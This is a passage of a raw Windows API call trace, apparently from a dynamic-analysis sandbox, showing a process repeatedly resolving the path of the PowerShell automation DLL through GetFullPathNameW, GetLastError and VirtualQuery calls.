lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.626] GetLastError () returned 0x0 [0044.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.626] GetLastError () returned 0x0 [0044.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.626] GetLastError () returned 0x0 [0044.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.626] GetLastError () returned 0x0 [0044.626] VirtualQuery (in: lpAddress=0x25cc34, lpBuffer=0x25dc34, dwLength=0x1c | out: lpBuffer=0x25dc34*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.626] VirtualQuery (in: lpAddress=0x25cc70, lpBuffer=0x25dc70, dwLength=0x1c | out: lpBuffer=0x25dc70*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d628, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.626] GetLastError () returned 0x0 [0044.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d5d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.626] GetLastError () returned 0x0 [0044.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d5d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.626] GetLastError () returned 0x0 [0044.626] VirtualQuery (in: lpAddress=0x25cc34, lpBuffer=0x25dc34, dwLength=0x1c | out: lpBuffer=0x25dc34*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.626] VirtualQuery (in: lpAddress=0x25cc70, lpBuffer=0x25dc70, dwLength=0x1c | out: lpBuffer=0x25dc70*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.627] GetLastError () returned 0x0 [0044.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.627] GetLastError () returned 0x0 [0044.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.627] GetLastError () returned 0x0 [0044.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.627] GetLastError () returned 0x0 [0044.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.627] GetLastError () returned 0x0 [0044.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.627] GetLastError () returned 0x0 [0044.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.627] GetLastError () returned 0x0 [0044.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.627] GetLastError () returned 0x0 [0044.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.627] GetLastError () returned 0x0 [0044.627] VirtualQuery (in: lpAddress=0x25cc34, lpBuffer=0x25dc34, dwLength=0x1c | out: lpBuffer=0x25dc34*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.627] VirtualQuery (in: lpAddress=0x25cc70, lpBuffer=0x25dc70, dwLength=0x1c | out: lpBuffer=0x25dc70*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d628, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.627] GetLastError () returned 0x0 [0044.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d5d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.627] GetLastError () returned 0x0 [0044.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d5d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.627] GetLastError () returned 0x0 [0044.627] VirtualQuery (in: lpAddress=0x25cc34, lpBuffer=0x25dc34, dwLength=0x1c | out: lpBuffer=0x25dc34*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.627] VirtualQuery (in: lpAddress=0x25cc70, lpBuffer=0x25dc70, dwLength=0x1c | out: lpBuffer=0x25dc70*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d628, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.627] GetLastError () returned 0x0 [0044.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d5d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.627] GetLastError () returned 0x0 [0044.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d5d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.628] GetLastError () returned 0x0 [0044.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.628] GetLastError () returned 0x0 [0044.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.628] GetLastError () returned 0x0 [0044.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.628] GetLastError () returned 0x0 [0044.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25daf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.628] GetLastError () returned 0x0 [0044.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.628] GetLastError () returned 0x0 [0044.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.628] GetLastError () returned 0x0 [0044.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.628] GetLastError () returned 0x0 [0044.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.628] GetLastError () returned 0x0 [0044.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.628] GetLastError () returned 0x0 [0044.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.628] GetLastError () returned 0x0 [0044.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.628] GetLastError () returned 0x0 [0044.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.628] GetLastError () returned 0x0 [0044.628] VirtualQuery (in: lpAddress=0x25d0a4, lpBuffer=0x25e0a4, dwLength=0x1c | out: lpBuffer=0x25e0a4*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.628] GetLastError () returned 0x0 [0044.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.628] GetLastError () returned 0x0 [0044.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.628] GetLastError () returned 0x0 [0044.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.629] GetLastError () returned 0x0 [0044.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.629] GetLastError () returned 0x0 [0044.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.629] GetLastError () returned 0x0 [0044.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.629] GetLastError () returned 0x0 [0044.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.629] GetLastError () returned 0x0 [0044.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.629] GetLastError () returned 0x0 [0044.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.629] GetLastError () returned 0x0 [0044.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.629] GetLastError () returned 0x0 [0044.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.629] GetLastError () returned 0x0 [0044.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.629] GetLastError () returned 0x0 [0044.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.629] GetLastError () returned 0x0 [0044.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.629] GetLastError () returned 0x0 [0044.629] VirtualQuery (in: lpAddress=0x25d0a4, lpBuffer=0x25e0a4, dwLength=0x1c | out: lpBuffer=0x25e0a4*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.629] GetLastError () returned 0x0 [0044.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.629] GetLastError () returned 0x0 [0044.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.629] GetLastError () returned 0x0 [0044.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.630] GetLastError () returned 0x0 [0044.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.630] GetLastError () returned 0x0 [0044.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.630] GetLastError () returned 0x0 [0044.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.630] GetLastError () returned 0x0 [0044.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.630] GetLastError () returned 0x0 [0044.630] GetFullPathNameW (in: 